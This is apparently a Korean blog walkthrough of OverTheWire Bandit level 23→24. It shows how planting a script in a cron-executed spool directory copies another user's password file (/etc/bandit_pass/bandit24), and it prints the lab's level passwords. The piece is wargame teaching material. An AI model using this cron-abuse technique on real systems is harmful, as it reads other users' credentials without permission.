[Bandit-OverTheWire] Level 23 -> Level 24
두비니
·2020. 9. 25. 08:02
Bandit Level 23 → Level 24Level GoalA program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed. NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level! NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around… Commands you may need to solve this levelcron, crontab, crontab(5) (use “man 5 crontab” to access this) |
접속
접속 : ssh bandit23@bandit.labs.overthewire.org -p2220
pw : jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
흠
코드의 내용은 /var/spool/bandit24안에있는 모든 스크립트를 실행시킨 뒤 60초 뒤에 지운다고 하네요.
그럼 지워지기 전에 /etc/bandit_pass/bandit24안에 있는 내용을 복사해봅시다.
bandit23@bandit:~$ mkdir -p /tmp/dubini2
bandit23@bandit:~$ cd /tmp/dubini2
bandit23@bandit:/tmp/dubini2$ cat dump.sh
cat: dump.sh: No such file or directory
bandit23@bandit:/tmp/dubini2$ cat > dump.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/dubini2/bandit_pass
^C
bandit23@bandit:/tmp/dubini2$ chmod 777 dump.sh
bandit23@bandit:/tmp/dubini2$ chmod 777 /tmp/dubini2
bandit23@bandit:/tmp/dubini2$ cp dump.sh /var/spool/bandit24/
bandit23@bandit:/tmp/dubini2$
bandit23@bandit:/tmp/dubini2$ cat bandit_pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
이렇게 하면 되는데 간단하게 설명할게요
일단 tmp에 제 폴더를 하나 만들어서 dump.sh라는 파일을 통해 bandit24 비밀번호를 제 폴더에 복사되게끔 하는 코드를 작성합니다.
그리고 난 뒤 쓰기권한문제때문에 디렉토리와 파일에 권한을 부여하고
마지막으로 dump.sh를 /var/spool/bandit24로 복사해주면 끝입니다.
그럼 복사가 잘 되어있는걸 볼 수 있습니다.
끝!
'War Games > Bandit - OverTheWire' 카테고리의 다른 글
[Bandit-OverTheWire] Level 25 -> Level 26 (0) | 2020.09.25 |
---|---|
[Bandit-OverTheWire] Level 24 -> Level 25 (0) | 2020.09.25 |
[Bandit-OverTheWire] Level 22 -> Level 23 (0) | 2020.09.24 |
[Bandit-OverTheWire] Level 21 -> Level 22 (0) | 2020.09.24 |
[Bandit-OverTheWire] Level 20 -> Level 21 (0) | 2020.09.24 |